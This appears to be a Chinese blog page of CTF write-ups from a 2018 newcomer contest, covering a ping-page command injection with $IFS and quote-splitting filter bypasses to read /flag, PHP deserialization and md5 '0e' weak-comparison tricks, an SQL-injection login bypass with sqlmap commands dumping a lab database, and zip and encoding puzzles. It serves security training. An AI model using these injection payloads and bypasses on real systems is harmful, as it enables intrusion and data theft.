Category - 新生赛2018

(比赛题目可能有改动,做法没变)
首先是一个网络测试页面。
title
随便填点东西。
title
title
出现?site=what的GET参数,猜测功能是输入一个ip或域名进行执行ping命令。
title
尝试命令注入。
输入localhost&&ls:
title
输入localhost&&ls /etc:
title
结果相同,可能是因为把空白字符之后的内容删除了。
输入localhost&&ls$IFS/etc ($IFS变量储存了一个空白字符):
title
命令正常执行了。
输入localhost&&ls$IFS/:
title
发现flag文件。
尝试读取,localhost&&cat$IFS/flag:
title
应该是服务器拦截了flag字符串,
把路径分割来绕过,localhost&&cat$IFS/fl''ag:
title
flag{P1ng_10c41h0st_c4t_f14g}

(比赛题目可能有改动,做法没变)
首先是一个登录页面。
title
随便填点东西登录。
title
显示一个FALSE
title
发现多了一个Cookie。
title
看格式应该是base64。
解码:
title
看样子是一个php序列化的对象。

网页右键源码
title
提示robots.txt
访问robots.txt
title
发现有另外两个页面
还可能有源码泄露
phpinfo.php:
title
sqldebug.php:
title
我们尝试访问index.php~和sqldebug.php~
title

  1. <?php
  2. ini_set('display_errors', 1);
  3. ini_set('display_startup_errors', 1);
  4. error_reporting(-1);
  5. class Auth {
  6. public $username = '';
  7. public $login = 0;
  8. public function verify() {
  9. return 'FALSE';
  10. }
  11. }
  12. ?>
  13. <!DOCTYPE html>
  14. <html>
  15. <head>
  16. <title>Login</title>
  17. </head>
  18. <body>
  19. <h1>Login</h1>
  20. <form action="" method="POST">
  21. <table>
  22. <tr>
  23. <td>Username</td>
  24. <td><input type="text" name="username"></td>
  25. </tr>
  26. <tr>
  27. <td>Password</td>
  28. <td><input type="password" name="password"></td>
  29. </tr>
  30. <tr>
  31. <td>Remember me <input type="checkbox" name="rememberme"></td>
  32. <td><input type="submit" value="Submit"></td>

(比赛题目可能有改动,做法没变)
首先是一个登录页面。
title
随便填点东西登录。
title
发现多了一个Cookie。
title
看格式应该是base64。
解码:
title

题目把输入转化为字符串,所以不用想改数组了。
因为两个md5比较的时候用的是==弱类型比较,0e开头的字符串在这种情况下可以当做0的某次方的科学计数法表示,也就是0。
所以任意两个md5是以0e开头,而且比较时用的是==时就能为真。
1
或者直接搜一对md5的碰撞

用php_mt_seed破解seed就好了
https://www.openwall.com/php_mt_seed/

(比赛题目可能有改动,做法没变)
首先一个登陆页面
title
猜用户:
admin
用’#尝试绕过
title
或直接绕过:
title
都能登陆。

title
登陆后跳转到sqldebug.php,有uid参数。
简单测试:
title
title

使用sqlmap(用自己的cookie):
sqlmap -u 'http://192.168.44.128/sqldebug.php?uid=1' --cookie='PHPSESSID=xxxxxxxxxx' –dbs
title

sqlmap -u 'http://192.168.44.128/sqldebug.php?uid=1' --cookie='PHPSESSID=xxxxxxxxxx' -D fakelogin1 –tables
title

sqlmap -u 'http://192.168.44.128/sqldebug.php?uid=1' --cookie='PHPSESSID=xxxxxxxxxx' -D fakelogin1 -T fffflllaaaaagggggg369 –dump
title

# bitcoin_base
base58加密,打开这个[CyberChef](https://gchq.github.io/CyberChef/)网站,选择base58解密,即可得到flag。 ![](https://leanote.com/api/file/getImage?fileId=5bd2f9b3ab64414167004d0d)
# 加密了吗
zip伪加密,可参看[zip伪加密](https://blog.csdn.net/pdsu161530247/article/details/73612910)。 ![](https://leanote.com/api/file/getImage?fileId=5bd2fa72ab6441435a004a15) 修改过后,即可解压得到flag。
# 真的加密了
zip密码爆破,用ARCHPR软件爆破。 注意选择适当范围,以及长度。 ![](https://leanote.com/api/file/getImage?fileId=5bd2fa79ab64414167004d3a)
# 移动支付
这是一个被切割了的二维码,将对应位置拼好,并将三个角的二维码定位点补上,即可扫描出结果。 ![](https://leanote.com/api/file/getImage?fileId=5bd2fa99ab64414167004d41)
    Page 1 of 4